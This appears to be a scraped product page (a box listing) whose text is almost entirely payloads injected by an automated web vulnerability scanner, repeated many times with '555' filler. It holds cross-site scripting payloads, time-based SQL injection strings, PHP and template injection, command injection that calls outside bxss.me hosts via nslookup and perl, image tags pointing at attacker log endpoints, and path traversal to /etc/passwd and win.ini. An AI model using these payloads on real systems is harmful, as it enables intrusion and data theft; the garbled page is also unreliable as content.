>Krabica: 270x270x90 mm
555<hk4BG0<
555<img sRc='http://attacker-9278/log.php?
555<4poHka x=9502>
555<ifRAme sRc=9917.com></IfRamE>
555<WTWFZW>DRHN3[!+!]</WTWFZW>
555tcqBG <ScRiPt >6AYI(9562)</ScRiPt>
555<% contenteditable onresize=6AYI(9916)>
555}body{acu:Expre/**/SSion(6AYI(9680))}
555<img<!-- --> src=x onerror=alert(9111);//><!-- -->
555
[url=http://xss.bxss.me][/url]
<a HrEF=jaVaScRiPT:>
<a HrEF=http://xss.bxss.me></a>
555<input autofocus onfocus=6AYI(9630)>
555<ScRiPt>6AYI(9242)</sCripT>
555\u003CScRiPt\6AYI(9732)\u003C/sCripT\u003E
%35%35%35%3C%53%63%52%69%50%74%20%3E%36%41%59%49%289993%29%3C%2F%73%43%72%69%70%54%3E
555<img/src=">" onerror=alert(9694)>
555<img src=xyz OnErRor=6AYI(9157)>
555<img src=//xss.bxss.me/t/dot.gif onload=6AYI(9825)>
555<body onload=6AYI(9283)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9754'>
555<isindex type=image src=1 onerror=6AYI(9451)>
555<video><source onerror="javascript:6AYI(9175)">
555<ScRiPt >6AYI(9903)</ScRiPt>
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9214></ScRiPt>
555<ScRiPt >6AYI(9234)</ScRiPt>
555<ScR<ScRiPt>IpT>6AYI(9781)</sCr<ScRiPt>IpT>
555<script>6AYI(9673)</script>
555<WY0IWZ>FOXH4[!+!]</WY0IWZ>
555<ScRiPt >6AYI(9364)</ScRiPt>
@{49590*50063}
{{49785*49928}}
acu8505?s1?s2?s3?uca8505
5559966638
'"()&%<acx><ScRiPt >6AYI(9056)</ScRiPt>
555'"()&%<acx><ScRiPt >6AYI(9080)</ScRiPt>
555<ZDstsE<
555<img sRc='http://attacker-9002/log.php?
555<JCA8vh x=9540>
555<ifRAme sRc=9432.com></IfRamE>
555<WMHCHV>QWXUT[!+!]</WMHCHV>
5557Jd3T <ScRiPt >XiP3(9118)</ScRiPt>
555<MYqGgH<
555<% contenteditable onresize=XiP3(9935)>
555<img sRc='http://attacker-9268/log.php?
555<qNk2pB x=9204>
555}body{acu:Expre/**/SSion(XiP3(9288))}
555<ifRAme sRc=9571.com></IfRamE>
555<img<!-- --> src=x onerror=alert(9897);//><!-- -->
555<WBDTBS>HTITK[!+!]</WBDTBS>
555rWkGj <ScRiPt >5D00(9246)</ScRiPt>
555<% contenteditable onresize=5D00(9557)>
555}body{acu:Expre/**/SSion(5D00(9013))}
555<img<!-- --> src=x onerror=alert(9533);//><!-- -->
555<input autofocus onfocus=XiP3(9742)>
555<ScRiPt>XiP3(9556)</sCripT>
555\u003CScRiPt\XiP3(9730)\u003C/sCripT\u003E
%35%35%35%3C%53%63%52%69%50%74%20%3E%58%69%50%33%289114%29%3C%2F%73%43%72%69%70%54%3E
555<input autofocus onfocus=5D00(9493)>
555<ScRiPt>5D00(9287)</sCripT>
555<img/src=">" onerror=alert(9180)>
555<img src=xyz OnErRor=XiP3(9552)>
555\u003CScRiPt\5D00(9773)\u003C/sCripT\u003E
555<img src=//xss.bxss.me/t/dot.gif onload=XiP3(9505)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%35%44%30%30%289061%29%3C%2F%73%43%72%69%70%54%3E
555<img/src=">" onerror=alert(9823)>
555<body onload=XiP3(9377)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9805'>
555<img src=xyz OnErRor=5D00(9280)>
555<isindex type=image src=1 onerror=XiP3(9665)>
555<img src=//xss.bxss.me/t/dot.gif onload=5D00(9284)>
555<body onload=5D00(9512)>
555<video><source onerror="javascript:XiP3(9637)">
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9938'>
555<isindex type=image src=1 onerror=5D00(9015)>
555<ScRiPt >XiP3(9831)</ScRiPt>
555<video><source onerror="javascript:5D00(9195)">
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9658></ScRiPt>
555<ScRiPt >5D00(9657)</ScRiPt>
555<ScRiPt >XiP3(9447)</ScRiPt>
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9005></ScRiPt>
555<ScR<ScRiPt>IpT>XiP3(9738)</sCr<ScRiPt>IpT>
555<ScRiPt >5D00(9404)</ScRiPt>
555<script>XiP3(9568)</script>
555<ScR<ScRiPt>IpT>5D00(9661)</sCr<ScRiPt>IpT>
555<script>5D00(9065)</script>
555<WIXDUV>BTBHB[!+!]</WIXDUV>
555<WL5HWS>FXMNE[!+!]</WL5HWS>
555<ScRiPt >5D00(9767)</ScRiPt>
555<ScRiPt >XiP3(9215)</ScRiPt>
@{50474*49193}
@{49791*49133}
{{49602*49444}}
{{49862*49047}}
acu4975?s1?s2?s3?uca4975
acu4867?s1?s2?s3?uca4867
5559180355
5559826115
'"()&%<acx><ScRiPt >5D00(9768)</ScRiPt>
'"()&%<acx><ScRiPt >XiP3(9670)</ScRiPt>
555'"()&%<acx><ScRiPt >XiP3(9262)</ScRiPt>
555'"()&%<acx><ScRiPt >5D00(9823)</ScRiPt>
555<Uujx6l<
555<img sRc='http://attacker-9671/log.php?
555<i9nu9T x=9390>
555<ifRAme sRc=9794.com></IfRamE>
555<WFMJUX>NOPTK[!+!]</WFMJUX>
555B6Lph <ScRiPt >3aWg(9526)</ScRiPt>
555<% contenteditable onresize=3aWg(9224)>
555}body{acu:Expre/**/SSion(3aWg(9084))}
555<img<!-- --> src=x onerror=alert(9977);//><!-- -->
555<input autofocus onfocus=3aWg(9798)>
555<ScRiPt>3aWg(9531)</sCripT>
555\u003CScRiPt\3aWg(9481)\u003C/sCripT\u003E
%35%35%35%3C%53%63%52%69%50%74%20%3E%33%61%57%67%289789%29%3C%2F%73%43%72%69%70%54%3E
555<img/src=">" onerror=alert(9879)>
555<img src=xyz OnErRor=3aWg(9271)>
555<img src=//xss.bxss.me/t/dot.gif onload=3aWg(9954)>
555<body onload=3aWg(9524)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9871'>
555<isindex type=image src=1 onerror=3aWg(9838)>
555<video><source onerror="javascript:3aWg(9623)">
555<ScRiPt >3aWg(9110)</ScRiPt>
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9606></ScRiPt>
555<ScRiPt >3aWg(9412)</ScRiPt>
555<ScR<ScRiPt>IpT>3aWg(9371)</sCr<ScRiPt>IpT>
555<script>3aWg(9514)</script>
555<WDCCFO>X8JJU[!+!]</WDCCFO>
555<ScRiPt >3aWg(9165)</ScRiPt>
@{50424*49519}
{{49048*50249}}
acu1417?s1?s2?s3?uca1417
5559512662
'"()&%<acx><ScRiPt >3aWg(9432)</ScRiPt>
555'"()&%<acx><ScRiPt >3aWg(9156)</ScRiPt>
@@hwWjh
1'"
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
BKKlrfbi')) OR 822=(SELECT 822 FROM PG_SLEEP(15))--
GlyO0oyn') OR 946=(SELECT 946 FROM PG_SLEEP(15))--
WMLdnHov' OR 690=(SELECT 690 FROM PG_SLEEP(15))--
-1)) OR 973=(SELECT 973 FROM PG_SLEEP(15))--
-5) OR 48=(SELECT 48 FROM PG_SLEEP(15))--
-5 OR 964=(SELECT 964 FROM PG_SLEEP(15))--
OU4DP6zM'; waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
-1; waitfor delay '0:0:15' --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
if(now()=sysdate(),sleep(15),0)
-1" OR 2+957-957-1=0+0+0+1 --
-1 OR 2+243-243-1=0+0+0+1 --
-1 OR 2+516-516-1=0+0+0+1
-1' OR 2+966-966-1=0+0+0+1 --
-1' OR 2+402-402-1=0+0+0+1 or 'r0ZeSS0B'='
555<xSJyu6<
555<img sRc='http://attacker-9573/log.php?
555<C3ptzh x=9929>
555<WHO05D>ETAJB[!+!]</WHO05D>
555<ifRAme sRc=9196.com></IfRamE>
555sSnzi <ScRiPt >j2L4(9397)</ScRiPt>
555<% contenteditable onresize=j2L4(9258)>
555}body{acu:Expre/**/SSion(j2L4(9927))}
555<img<!-- --> src=x onerror=alert(9317);//><!-- -->
555<input autofocus onfocus=j2L4(9115)>
555<ScRiPt>j2L4(9200)</sCripT>
555\u003CScRiPt\j2L4(9391)\u003C/sCripT\u003E
%35%35%35%3C%53%63%52%69%50%74%20%3E%6A%32%4C%34%289042%29%3C%2F%73%43%72%69%70%54%3E
555<img/src=">" onerror=alert(9140)>
555<img src=xyz OnErRor=j2L4(9458)>
555<img src=//xss.bxss.me/t/dot.gif onload=j2L4(9091)>
555<body onload=j2L4(9787)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9650'>
555<isindex type=image src=1 onerror=j2L4(9048)>
555<video><source onerror="javascript:j2L4(9844)">
555<ScRiPt >j2L4(9819)</ScRiPt>
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9874></ScRiPt>
555<ScR<ScRiPt>IpT>j2L4(9384)</sCr<ScRiPt>IpT>
555<ScRiPt >j2L4(9840)</ScRiPt>
555<script>j2L4(9011)</script>
555<WE63UV>Y2SQM[!+!]</WE63UV>
555<ScRiPt >j2L4(9611)</ScRiPt>
@{50009*49610}
{{50096*49331}}
acu10290?s1?s2?s3?uca10290
'"()&%<acx><ScRiPt >j2L4(9449)</ScRiPt>
5559134283
555'"()&%<acx><ScRiPt >j2L4(9282)</ScRiPt>
'.print(md5(31337)).'
';print(md5(31337));$a='
";print(md5(31337));$a="
${@print(md5(31337))}
${@print(md5(31337))}\
|(nslookup hitfduenipibk9101d.bxss.me||perl -e "gethostbyname('hitfduenipibk9101d.bxss.me')")
`(nslookup hitummukuxwyuccda5.bxss.me||perl -e "gethostbyname('hitummukuxwyuccda5.bxss.me')")`
;(nslookup hitlvafkjlyux03f2b.bxss.me||perl -e "gethostbyname('hitlvafkjlyux03f2b.bxss.me')")|(nslookup hitlvafkjlyux03f2b.bxss.me||perl -e "gethostbyname('hitlvafkjlyux03f2b.bxss.me')")&(nslookup hitlvafkjlyux03f2b.bxss.me||perl -e "gethostbyname('hitlvafkjlyux03f2b.bxss.me')")
$(nslookup hitwcqbpxlavb9b685.bxss.me||perl -e "gethostbyname('hitwcqbpxlavb9b685.bxss.me')")
&(nslookup hitmzyydeaqnjd3ce3.bxss.me||perl -e "gethostbyname('hitmzyydeaqnjd3ce3.bxss.me')")&'\"`0&(nslookup hitmzyydeaqnjd3ce3.bxss.me||perl -e "gethostbyname('hitmzyydeaqnjd3ce3.bxss.me')")&`'
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
bxss.me
(nslookup hitnpmmjkxiclb6535.bxss.me||perl -e "gethostbyname('hitnpmmjkxiclb6535.bxss.me')")
;print(md5(31337));
|echo phkyci$()\ fzqnii\nz^xyu||a #' |echo phkyci$()\ fzqnii\nz^xyu||a #|" |echo phkyci$()\ fzqnii\nz^xyu||a #
1some_inexistent_file_with_long_name.jpg
&echo ydweoa$()\ givpzn\nz^xyu||a #' &echo ydweoa$()\ givpzn\nz^xyu||a #|" &echo ydweoa$()\ givpzn\nz^xyu||a #
echo efeqku$()\ qihmju\nz^xyu||a #' &echo efeqku$()\ qihmju\nz^xyu||a #|" &echo efeqku$()\ qihmju\nz^xyu||a #
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
../555
2232/.
2232
../../../../../../../../../../windows/win.ini
"+response.write(9148815*9202402)+"
^(#$!@#$)(()))******
'+response.write(9148815*9202402)+'
../../../../../../../../../../etc/passwd
)
!(()&&!|*|*|
response.write(9148815*9202402)
/xfs.bxss.me
1TIKplBeO
bxss.me/t/xss.html?%00
'"()
'+'A'.concat(70-3).concat(22*4).concat(114).concat(74).concat(122).concat(82)+(require'socket' Socket.gethostbyname('hitbl'+'qiyahbck80f9a.bxss.me.')[3].to_s)+'
"+"A".concat(70-3).concat(22*4).concat(102).concat(75).concat(101).concat(77)+(require"socket" Socket.gethostbyname("hitjq"+"lfzvxyop98f0b.bxss.me.")[3].to_s)+"
HttP://bxss.me/t/xss.html?%00
".gethostbyname(lc("hitxs"."frhrozkd293b4.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(88).chr(100).chr(89)."
<!--
'"
'.gethostbyname(lc('hitup'.'jlxrvwdzc5635.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(90).chr(106).chr(76).'
${10000104+9999197}
555<esi:include src="http://bxss.me/rpb.png"/>
Copyright © 2017 Xabax . All Right Reserved.
555<hk4BG0<
555<img sRc='http://attacker-9278/log.php?
555<img sRc='http://attacker-9278/log.php?
555<4poHka x=9502>
555<ifRAme sRc=9917.com></IfRamE>
555<WTWFZW>DRHN3[!+!]</WTWFZW>
555tcqBG <ScRiPt >6AYI(9562)</ScRiPt>
555<% contenteditable onresize=6AYI(9916)>
555}body{acu:Expre/**/SSion(6AYI(9680))}
555<img<!-- --> src=x onerror=alert(9111);//><!-- -->
555
[url=http://xss.bxss.me][/url]
<a HrEF=jaVaScRiPT:>
555
<a HrEF=http://xss.bxss.me></a>
555
555
555
555<input autofocus onfocus=6AYI(9630)>
555
555<ScRiPt>6AYI(9242)</sCripT>
555
555\u003CScRiPt\6AYI(9732)\u003C/sCripT\u003E
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%36%41%59%49%289993%29%3C%2F%73%43%72%69%70%54%3E
555
555<img/src=">" onerror=alert(9694)>
555<img/src=">" onerror=alert(9694)>
555
555
555<img src=xyz OnErRor=6AYI(9157)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=6AYI(9825)>
555
555<body onload=6AYI(9283)>
555
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9754'>
555
555
555<isindex type=image src=1 onerror=6AYI(9451)>
555
555
555<video><source onerror="javascript:6AYI(9175)">
555
555<ScRiPt >6AYI(9903)</ScRiPt>
555
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9214></ScRiPt>
555
555<ScRiPt >6AYI(9234)</ScRiPt>
555
555<ScR<ScRiPt>IpT>6AYI(9781)</sCr<ScRiPt>IpT>
555
555<script>6AYI(9673)</script>
555<WY0IWZ>FOXH4[!+!]</WY0IWZ>
555
555<ScRiPt >6AYI(9364)</ScRiPt>
555
@{49590*50063}
555
555
{{49785*49928}}
555
555
555
555
acu8505?s1?s2?s3?uca8505
555
5559966638
'"()&%<acx><ScRiPt >6AYI(9056)</ScRiPt>
555
555'"()&%<acx><ScRiPt >6AYI(9080)</ScRiPt>
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555<ZDstsE<
555
555<img sRc='http://attacker-9002/log.php?
555<JCA8vh x=9540>
555
555<ifRAme sRc=9432.com></IfRamE>
555<WMHCHV>QWXUT[!+!]</WMHCHV>
555
555
5557Jd3T <ScRiPt >XiP3(9118)</ScRiPt>
555
555<MYqGgH<
555<% contenteditable onresize=XiP3(9935)>
555<img sRc='http://attacker-9268/log.php?
555
555<qNk2pB x=9204>
555
555}body{acu:Expre/**/SSion(XiP3(9288))}
555<ifRAme sRc=9571.com></IfRamE>
555<img<!-- --> src=x onerror=alert(9897);//><!-- -->
555
555
[url=http://xss.bxss.me][/url]
555<WBDTBS>HTITK[!+!]</WBDTBS>
555
<a HrEF=jaVaScRiPT:>
555
555rWkGj <ScRiPt >5D00(9246)</ScRiPt>
555
<a HrEF=http://xss.bxss.me></a>
555
555
555<% contenteditable onresize=5D00(9557)>
<a HrEF=http://xss.bxss.me></a>
555
555}body{acu:Expre/**/SSion(5D00(9013))}
555
555
555<img<!-- --> src=x onerror=alert(9533);//><!-- -->
555
555
555<input autofocus onfocus=XiP3(9742)>
555
555
[url=http://xss.bxss.me][/url]
555
555<ScRiPt>XiP3(9556)</sCripT>
555
<a HrEF=jaVaScRiPT:>
555\u003CScRiPt\XiP3(9730)\u003C/sCripT\u003E
555
555
<a HrEF=http://xss.bxss.me></a>
%35%35%35%3C%53%63%52%69%50%74%20%3E%58%69%50%33%289114%29%3C%2F%73%43%72%69%70%54%3E
555<input autofocus onfocus=5D00(9493)>
555
555
555
555<ScRiPt>5D00(9287)</sCripT>
555
555<img/src=">" onerror=alert(9180)>
555
555
555
555<img src=xyz OnErRor=XiP3(9552)>
555\u003CScRiPt\5D00(9773)\u003C/sCripT\u003E
555<img src=//xss.bxss.me/t/dot.gif onload=XiP3(9505)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%35%44%30%30%289061%29%3C%2F%73%43%72%69%70%54%3E
555
555<img/src=">" onerror=alert(9823)>
555<body onload=XiP3(9377)>
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9805'>
555
555<img src=xyz OnErRor=5D00(9280)>
555
555<isindex type=image src=1 onerror=XiP3(9665)>
555<img src=//xss.bxss.me/t/dot.gif onload=5D00(9284)>
555
555
555<body onload=5D00(9512)>
555
555
555<video><source onerror="javascript:XiP3(9637)">
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9938'>
555<isindex type=image src=1 onerror=5D00(9015)>
555
555<ScRiPt >XiP3(9831)</ScRiPt>
555
555<video><source onerror="javascript:5D00(9195)">
555
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9658></ScRiPt>
555<ScRiPt >5D00(9657)</ScRiPt>
555
555<ScRiPt >XiP3(9447)</ScRiPt>
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9005></ScRiPt>
555
555<ScR<ScRiPt>IpT>XiP3(9738)</sCr<ScRiPt>IpT>
555<ScRiPt >5D00(9404)</ScRiPt>
555
555<script>XiP3(9568)</script>
555<ScR<ScRiPt>IpT>5D00(9661)</sCr<ScRiPt>IpT>
555
555<script>5D00(9065)</script>
555<WIXDUV>BTBHB[!+!]</WIXDUV>
555
555<WL5HWS>FXMNE[!+!]</WL5HWS>
555
555<ScRiPt >5D00(9767)</ScRiPt>
555
555<ScRiPt >XiP3(9215)</ScRiPt>
@{50474*49193}
@{49791*49133}
555
{{49602*49444}}
{{49862*49047}}
555
555
acu4975?s1?s2?s3?uca4975
555
acu4867?s1?s2?s3?uca4867
555
5559180355
5559826115
'"()&%<acx><ScRiPt >5D00(9768)</ScRiPt>
'"()&%<acx><ScRiPt >XiP3(9670)</ScRiPt>
555
555'"()&%<acx><ScRiPt >XiP3(9262)</ScRiPt>
555'"()&%<acx><ScRiPt >5D00(9823)</ScRiPt>
555
555
555
555<Uujx6l<
555<img sRc='http://attacker-9671/log.php?
555<i9nu9T x=9390>
555<ifRAme sRc=9794.com></IfRamE>
555
555<WFMJUX>NOPTK[!+!]</WFMJUX>
555B6Lph <ScRiPt >3aWg(9526)</ScRiPt>
555
555
555
555<% contenteditable onresize=3aWg(9224)>
555
555}body{acu:Expre/**/SSion(3aWg(9084))}
555
555<img<!-- --> src=x onerror=alert(9977);//><!-- -->
555
555
[url=http://xss.bxss.me][/url]
555
555
<a HrEF=jaVaScRiPT:>
<a HrEF=http://xss.bxss.me></a>
555
555<input autofocus onfocus=3aWg(9798)>
555
555
555<ScRiPt>3aWg(9531)</sCripT>
555
555\u003CScRiPt\3aWg(9481)\u003C/sCripT\u003E
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%33%61%57%67%289789%29%3C%2F%73%43%72%69%70%54%3E
555<img/src=">" onerror=alert(9879)>
555
555<img src=xyz OnErRor=3aWg(9271)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=3aWg(9954)>
555
555<body onload=3aWg(9524)>
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9871'>
555<isindex type=image src=1 onerror=3aWg(9838)>
555
555
555
555<video><source onerror="javascript:3aWg(9623)">
555
555<ScRiPt >3aWg(9110)</ScRiPt>
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9606></ScRiPt>
555
555<ScRiPt >3aWg(9412)</ScRiPt>
555
555<ScR<ScRiPt>IpT>3aWg(9371)</sCr<ScRiPt>IpT>
555<script>3aWg(9514)</script>
555
555<WDCCFO>X8JJU[!+!]</WDCCFO>
555
555<ScRiPt >3aWg(9165)</ScRiPt>
555
555
@{50424*49519}
555
{{49048*50249}}
555
555
acu1417?s1?s2?s3?uca1417
5559512662
555
'"()&%<acx><ScRiPt >3aWg(9432)</ScRiPt>
555
555
555'"()&%<acx><ScRiPt >3aWg(9156)</ScRiPt>
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
@@hwWjh
1'"
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
BKKlrfbi')) OR 822=(SELECT 822 FROM PG_SLEEP(15))--
GlyO0oyn') OR 946=(SELECT 946 FROM PG_SLEEP(15))--
WMLdnHov' OR 690=(SELECT 690 FROM PG_SLEEP(15))--
-1)) OR 973=(SELECT 973 FROM PG_SLEEP(15))--
-5) OR 48=(SELECT 48 FROM PG_SLEEP(15))--
-5 OR 964=(SELECT 964 FROM PG_SLEEP(15))--
OU4DP6zM'; waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
-1; waitfor delay '0:0:15' --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
if(now()=sysdate(),sleep(15),0)
-1" OR 2+957-957-1=0+0+0+1 --
555
-1 OR 2+243-243-1=0+0+0+1 --
-1 OR 2+516-516-1=0+0+0+1
-1' OR 2+966-966-1=0+0+0+1 --
-1' OR 2+402-402-1=0+0+0+1 or 'r0ZeSS0B'='
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555<xSJyu6<
555
555<img sRc='http://attacker-9573/log.php?
555
555<C3ptzh x=9929>
555
555<WHO05D>ETAJB[!+!]</WHO05D>
555
555<ifRAme sRc=9196.com></IfRamE>
555sSnzi <ScRiPt >j2L4(9397)</ScRiPt>
555
555<% contenteditable onresize=j2L4(9258)>
555
555}body{acu:Expre/**/SSion(j2L4(9927))}
555<img<!-- --> src=x onerror=alert(9317);//><!-- -->
[url=http://xss.bxss.me][/url]
555
<a HrEF=jaVaScRiPT:>
555
<a HrEF=http://xss.bxss.me></a>
555<input autofocus onfocus=j2L4(9115)>
555<ScRiPt>j2L4(9200)</sCripT>
555\u003CScRiPt\j2L4(9391)\u003C/sCripT\u003E
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%6A%32%4C%34%289042%29%3C%2F%73%43%72%69%70%54%3E
555<img/src=">" onerror=alert(9140)>
555<img src=xyz OnErRor=j2L4(9458)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=j2L4(9091)>
555<body onload=j2L4(9787)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9650'>
555
555<isindex type=image src=1 onerror=j2L4(9048)>
555<video><source onerror="javascript:j2L4(9844)">
555<ScRiPt >j2L4(9819)</ScRiPt>
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9874></ScRiPt>
555<ScR<ScRiPt>IpT>j2L4(9384)</sCr<ScRiPt>IpT>
555<ScRiPt >j2L4(9840)</ScRiPt>
555
555<script>j2L4(9011)</script>
555<WE63UV>Y2SQM[!+!]</WE63UV>
555<ScRiPt >j2L4(9611)</ScRiPt>
@{50009*49610}
{{50096*49331}}
555
555
acu10290?s1?s2?s3?uca10290
555
555
555
555
555
'"()&%<acx><ScRiPt >j2L4(9449)</ScRiPt>
5559134283
555
555'"()&%<acx><ScRiPt >j2L4(9282)</ScRiPt>
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'.print(md5(31337)).'
';print(md5(31337));$a='
";print(md5(31337));$a="
${@print(md5(31337))}
${@print(md5(31337))}\
555
555
555
555
555
555
555
555
555
555
555
555
555
555
|(nslookup hitfduenipibk9101d.bxss.me||perl -e "gethostbyname('hitfduenipibk9101d.bxss.me')")
`(nslookup hitummukuxwyuccda5.bxss.me||perl -e "gethostbyname('hitummukuxwyuccda5.bxss.me')")`
555
;(nslookup hitlvafkjlyux03f2b.bxss.me||perl -e "gethostbyname('hitlvafkjlyux03f2b.bxss.me')")|(nslookup hitlvafkjlyux03f2b.bxss.me||perl -e "gethostbyname('hitlvafkjlyux03f2b.bxss.me')")&(nslookup hitlvafkjlyux03f2b.bxss.me||perl -e "gethostbyname('hitlvafkjlyux03f2b.bxss.me')")
555
555
555
555
555
555
$(nslookup hitwcqbpxlavb9b685.bxss.me||perl -e "gethostbyname('hitwcqbpxlavb9b685.bxss.me')")
&(nslookup hitmzyydeaqnjd3ce3.bxss.me||perl -e "gethostbyname('hitmzyydeaqnjd3ce3.bxss.me')")&'\"`0&(nslookup hitmzyydeaqnjd3ce3.bxss.me||perl -e "gethostbyname('hitmzyydeaqnjd3ce3.bxss.me')")&`'
555
555
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
555
bxss.me
555
555
555
555
555
555
555
(nslookup hitnpmmjkxiclb6535.bxss.me||perl -e "gethostbyname('hitnpmmjkxiclb6535.bxss.me')")
555
;print(md5(31337));
|echo phkyci$()\ fzqnii\nz^xyu||a #' |echo phkyci$()\ fzqnii\nz^xyu||a #|" |echo phkyci$()\ fzqnii\nz^xyu||a #
1some_inexistent_file_with_long_name.jpg
&echo ydweoa$()\ givpzn\nz^xyu||a #' &echo ydweoa$()\ givpzn\nz^xyu||a #|" &echo ydweoa$()\ givpzn\nz^xyu||a #
echo efeqku$()\ qihmju\nz^xyu||a #' &echo efeqku$()\ qihmju\nz^xyu||a #|" &echo efeqku$()\ qihmju\nz^xyu||a #
555
555
555
555
555
555
555
555
555
555
555
555
555
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
../555
555
555
555
555
2232/.
555
555
2232
555
555
555
555
555
555
555
555
../../../../../../../../../../windows/win.ini
555
555
555
555
"+response.write(9148815*9202402)+"
555
^(#$!@#$)(()))******
555
555
555
'+response.write(9148815*9202402)+'
2232
555
555
../../../../../../../../../../etc/passwd
555
555
)
555
!(()&&!|*|*|
555
555
555
response.write(9148815*9202402)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
/xfs.bxss.me
1TIKplBeO
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
bxss.me/t/xss.html?%00
'"()
555
555
555
555
555
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(114).concat(74).concat(122).concat(82)+(require'socket' Socket.gethostbyname('hitbl'+'qiyahbck80f9a.bxss.me.')[3].to_s)+'
555
555
555
555
555
"+"A".concat(70-3).concat(22*4).concat(102).concat(75).concat(101).concat(77)+(require"socket" Socket.gethostbyname("hitjq"+"lfzvxyop98f0b.bxss.me.")[3].to_s)+"
555
555
555
HttP://bxss.me/t/xss.html?%00
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
".gethostbyname(lc("hitxs"."frhrozkd293b4.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(88).chr(100).chr(89)."
<!--
555
555
555
555
555
555
'"
555
555
'.gethostbyname(lc('hitup'.'jlxrvwdzc5635.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(90).chr(106).chr(76).'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
${10000104+9999197}
555
555
555
555
555
555
555
555
555
555
555
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
555
555
555
555
555
555
555
555
555